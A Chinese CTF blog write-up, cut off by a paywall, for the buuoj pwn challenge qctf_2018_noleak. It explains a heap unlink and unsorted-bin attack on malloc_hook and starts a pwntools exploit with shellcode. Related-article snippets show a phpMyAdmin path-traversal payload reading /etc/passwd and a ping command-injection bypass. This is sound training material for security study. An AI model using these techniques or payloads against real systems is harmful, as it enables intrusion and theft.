buuoj Pwn writeup 261-265

利用内存漏洞进行安全攻击的技术分析
最新推荐文章于 2024-03-12 21:30:23 发布
原创 最新推荐文章于 2024-03-12 21:30:23 发布 · 578 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文探讨了两种利用内存漏洞进行攻击的方法:一是通过unlink机制和unsorted_binattack控制malloc_hook;二是利用fastbin_attackmalloc_hookattcak组合。在不同的libc版本中,这些技术展示了如何通过堆溢出和野指针管理来执行任意代码。同时,文章还介绍了通过盲注技巧在系统调用被禁用的情况下爆破flag。最后,文章提到了一种利用syscall和shellcode绕过限制的方法。

261 qctf_2018_noleak

在这里插入图片描述就像题目说的一样,程序很简单,但确实是没有泄露地址的地方。

delete 里面没有清理野指针 造成UAF
update 里面可以重新输入读入的长度 造成堆溢出

那问题来了,怎么利用这两个漏洞点。
有两种利用方法,下面那一堆链接里面有。

第一种
我们先通过unlink机制,控制buf部分内容,结合题目具体点就是把buf-0x18的地址写到了buf中,然后利用unsorted_bin attack,把buf看成是一个chunk,将main_arena + 0x88的地址写到buf[6]的地方,再覆盖地址最后两个字节为0x10,从而变成malloc_hook的地址,从而控制malloc_hook,执行提前再bss上写好的shellcode。不停的可以再buf上写是每次写的时候再把buf地址写在buf数组中,就可以一直写。

第二种
就是常说的fastbin_attack malloc_hook attcak组合拳, 下面那链接几个里面有详细介绍组合拳的,我就不罗嗦了。

值得注意的是,unsorted bin attack是在libc2.28之后才消失的,所以这个2.27还是可以unsorted bin attack的。

from pwn import *
context.os = 'linux'
context.arch = 'amd64'
context.log_level = "debug"
r = remote("node4.buuoj.cn", 25467)
#r = process("./261")

elf = ELF('./261')
libc = ELF('./64/libc-2.27.so')

shellcode = asm(shellcraft.sh())

def create(size,content):  
   r.sendlineafter('Your choice :','1')  
   r.sendlineafter('Size: ',str(size))  
   r.sendafter('Data: ',content) 
 
def edit(index,size,content):  
   r.sendlineafter('Your choice :','3')  
   r.sendlineafter('Index: ',str(index))  
   r.sendlineafter('Size: ',str(size))  
   r.sendafter('Data: ',content)  

def delete(index):  
   r.sendlineafter('Your choice :','2')  
   r.sendlineafter('Index: ',str(index))  

bss_addr = 0x601020
buf_addr = 0x601040

create(0x90,'a'*0x90)
create(0x420,'b'*0x420)
create(0x90,'b'*0x90)

payload = p64(0) + p64(0x91)
payload += p64(buf_addr - 0x18) + p64(buf_addr - 0x10)
payload += (0x90 - 32) * 'a'
payload += p64(0x90) + p64(0X430)</
最低0.47元/天 解锁文章
Xman2018冬令营选拔赛arm-pwn
Peanuts
01-05 941
arm32-pwn从环境搭建到实战 关于arm的pwn还是比较令人头疼的,首先汇编比较难看懂,其次就是ida反编译出来的东西还会有错误,比如之后要讲的题目中栈的分布就和ida解析出来的完全不一样。那么先来看一看环境的搭建。之前有人发过完整的64的环境搭建,32的环境搭建和实战还是有一些不同的 环境搭建 环境的搭建应该是现在arm题目中比较麻烦的一个点。 安装qemu apt-get in...
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
手写shellcode
tbsqigongzi的博客
10-20 555
rctf_2019_shellcoder--手写汇编
new-easy(pwn)
最新发布
m0_72827793的博客
03-12 1949
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
[羊城杯 2020]Easyphp2&&[羊城杯 2020]Blackcat
2202_75361164的博客
12-04 306
[羊城杯 2020]Easyphp2&&[羊城杯 2020]Blackcat
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 364
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 骇极杯_2018_babyarm 249 metasequoia_2020_samsara
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 587
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 384
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法)
seaaseesa的博客
05-01 816
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,仅两个功能 其中,delete功能只能用3次,delete功能没有清空指针,存在double free漏洞。 Add功能,size不可控,结尾printf可以输出堆内容。 我们可以利用add结尾的printf输出,main_are...
2020YCBCTF:2020羊城杯官方writeup
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
2020YCBCTF羊城杯官方Writeup.pdf
10-28
2020YCBCTF羊城杯官方Writeup.pdf
PWN_EASYPWN(2020网鼎杯)
耐酸碱高温固化材料近距离传输研究
12-10 582
逻辑很简单的一道题,nc上服务后发现提示: please input the c code,we will Compile and execute 实际上就是输入一段c代码服务器会自动编译执行。 但随便输入一些C代码发现程序会过滤除尖括号外的所有括号字符。 非预期解为直接输入: #include </flag> 则gcc编译代码时报错将flag内容暴露出来。 预期解为输入: const char main=72,b=184,c=47,d=98,e=105,f=110,g=47,h
[BUUCTF]PWN——[极客大挑战 2019]Not Bad (orw_shellcode)
mcmuyanga的博客
01-30 2902
[极客大挑战 2019]Not Bad 附件 步骤
[GWCTF 2019]我有一个数据库
夜幕下的灯火阑珊的博客
05-14 1508
知识点 phpmyadmin任意文件读取 dirb扫描到后台有phpmyadmin目录,访问一下 版本为4.81,经查询,存在远程文件读取漏洞 直接上payload读取passwd文件 /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 读取成功,尝试读...
[BUUCTF][GWCTF 2019]mypassword
Y4tacker的博客
10-17 2956
首先从登陆界面看到了提示 发现了一串js代码,这段话是什么意思很easy了 if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {}; for (var i = 0; i < cookies.length; i++) { var arr = cookies[i].split('='); var key = arr[0
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3504
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
pwn】SWPUCTF_2019_p1KkHeap
Nothing
12-10 811
libc-2.27.so下的一道tcache堆题。 例行检查 保护全开。 分析程序,在进入菜单之前,有一个函数跟入查看。 注意到这边用mmap函数在0x66660000映射了一块大小为0x1000的内存空间,权限是rwx。然后用prctl函数做了一个沙箱。我们查看以下禁用了什么调用。 可见execve被禁用,于是system函数和onegadget都不可行。于是就只能自己将shellcode(or...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2583
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值